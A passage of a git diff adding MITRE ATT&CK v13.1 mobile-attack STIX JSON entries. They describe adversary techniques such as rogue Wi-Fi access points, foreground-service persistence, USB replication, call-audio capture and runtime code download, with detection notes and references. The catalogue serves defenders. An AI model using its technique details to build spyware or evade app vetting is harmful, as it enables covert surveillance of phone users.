"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json new file mode 100644 index 0000000000000000000000000000000000000000..2bfeebca9b9ced7eb656c04d0047214d90f29d55 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--2c9754ff-99f0-443e-a86e-a79baa04973f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "created": "2017-10-25T14:48:21.354Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1465", + "url": "https://attack.mitre.org/techniques/T1465" + }, + { + "source_name": "Kaspersky-DarkHotel", + "url": "https://blog.kaspersky.com/darkhotel-apt/6613/", + "description": "Alex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016." + }, + { + "source_name": "NIST-SP800153", + "url": "http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf", + "description": "M. Souppaya and K. Scarfone. (2012, February). NIST SP 800-153 Guidelines for Securing Wireless Local Area Networks (WLANs). Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "LPN-0" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).", + "modified": "2022-04-06T15:51:11.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Wi-Fi Access Points", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json new file mode 100644 index 0000000000000000000000000000000000000000..afc675fbe62de67981ae9f095d8534be0c37d8a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--e04e05b0-879a-4dc6-8f34-c3660ee16ae8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:54:25.564Z", + "name": "Foreground Persistence", + "description": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android\u2019s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)\n\nMalicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device\u2019s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n\nMalicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "created": "2019-11-19T17:32:20.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1541", + "external_id": "T1541" + }, + { + "source_name": "Android-SensorsOverview", + "description": "Google. (n.d.). Sensors Overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices" + }, + { + "source_name": "Android-ForegroundServices", + "description": "Google. (n.d.). Services overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/components/services.html#Foreground" + }, + { + "source_name": "TrendMicro-Yellow Camera", + "description": "Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/" + }, + { + "source_name": "BlackHat Sutter Android Foreground 2019", + "description": "Thomas Sutter. (2019, December). Simple Spyware Androids Invisible Foreground Services and How to (Ab)use Them. Retrieved December 26, 2019.", + "url": "https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json new file mode 100644 index 0000000000000000000000000000000000000000..a21563f321be50eabec6ef22612300a8e6f255ee --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--8185466b-cd0c-4b69-980b-7945622a30ce", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "created": "2017-10-25T14:48:23.233Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1458", + "url": "https://attack.mitre.org/techniques/T1458" + }, + { + "source_name": "Krebs-JuiceJacking", + "url": "http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/", + "description": "Brian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016." + }, + { + "source_name": "GoogleProjectZero-OATmeal", + "url": "https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html", + "description": "Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018." + }, + { + "source_name": "Lau-Mactans", + "url": "https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf", + "description": "Lau et al.. (2013). Mactans: Injecting Malware Into iOS Devices Via Malicious Chargers. Retrieved December 23, 2016." + }, + { + "source_name": "Computerworld-iPhoneCracking", + "url": "https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html", + "description": "Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology \u2013 and police are buying. Retrieved September 21, 2018." + }, + { + "source_name": "IBM-NexusUSB", + "url": "https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/", + "description": "Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-1" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-6" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include: \n \n* Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) \n* Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) \n* Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: Computerworld-iPhoneCracking) ", + "modified": "2022-04-08T15:53:11.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replication Through Removable Media", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "lateral-movement", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json new file mode 100644 index 0000000000000000000000000000000000000000..ed3cb707e607765a73f4ae984d966e1e94af778b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--589484b8-8d61-442e-bef7-fbb3a9311131", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T13:31:29.924Z", + "name": "Audio Capture", + "description": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. \n\n \n\nAndroid and iOS, by default, require that applications request device microphone access from the user. \n\n \n\nOn Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n\n \n\nOn iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\n\n\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\n \n\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized. \n\n \n\nIn both Android (6.0 and up) and iOS, users can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "created": "2017-10-25T14:48:12.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1429", + "external_id": "T1429" + }, + { + "source_name": "Manifest.permission", + "description": "Android Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.", + "url": "https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL" + }, + { + "source_name": "Requesting Auth-Media Capture", + "description": "Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "Android Privacy Indicators", + "description": "Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.", + "url": "https://source.android.com/devices/tech/config/privacy-indicators" + }, + { + "source_name": "iOS Mic Spyware", + "description": "ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.", + "url": "https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json new file mode 100644 index 0000000000000000000000000000000000000000..44580816ed453e06854ca6e9e307fa60f9c8c5d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--177e4394-2b22-4420-b6c4-d12df8c33dca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:46.686Z", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "created": "2022-03-30T14:49:18.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625", + "external_id": "T1625" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json new file mode 100644 index 0000000000000000000000000000000000000000..a1bbc6c9a78a97a983ffd8b26a3e658a30efef14 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6028e15a-f8c2-4b13-a016-6c55698fe8da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:41:18.389Z", + "name": "Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. \n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. \n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. \n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "created": "2022-03-30T13:59:50.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623/001", + "external_id": "T1623.001" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json new file mode 100644 index 0000000000000000000000000000000000000000..76a1c545732a8399df90d771b9bd5e985e55cee2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--e4c9fa20-efc7-41f7-86d4-e44de9d2a27f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "created": "2017-10-25T14:48:33.158Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437", + "url": "https://attack.mitre.org/techniques/T1437" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.", + "modified": "2022-04-19T20:03:51.831Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Layer Protocol", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json new file mode 100644 index 0000000000000000000000000000000000000000..aed6a960de2d71f0dfafecb46a576380a07fc80a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--95ef1e11-0287-42e1-9a3a-249793a11aef", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:11.861Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1431", + "external_id": "T1431" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Web Download", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json new file mode 100644 index 0000000000000000000000000000000000000000..74b41b3cfa9e9258cf14f3b7853a871c20d395b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--353f142f-79a9-45cf-9324-359f0695a313", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:21:59.494Z", + "name": "Download New Code at Runtime", + "description": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView\u2019s `JavascriptInterface` capability. \n\nOn iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Existing network infrastructure may detect network calls to known malicious domains or the transfer of malicious payloads over the network. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities). Unfortunately, this is only a partial mitigation, as additional scrutiny would still need to be applied to applications that use these techniques. These techniques are often used without malicious intent, and applications may employ other techniques to hide their use of these techniques.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.4", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "created": "2017-10-25T14:48:14.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1407", + "external_id": "T1407" + }, + { + "source_name": "FireEye-JSPatch", + "description": "Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "external_id": "APP-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json new file mode 100644 index 0000000000000000000000000000000000000000..5430198ca80d6ed3286f3d0d2b95e2c43838d9f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--5f283ecd-9ed4-4c0c-a229-0f6eec016483", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "created": "2017-10-25T14:48:21.023Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1468", + "url": "https://attack.mitre.org/techniques/T1468" + }, + { + "source_name": "Krebs-Location", + "url": 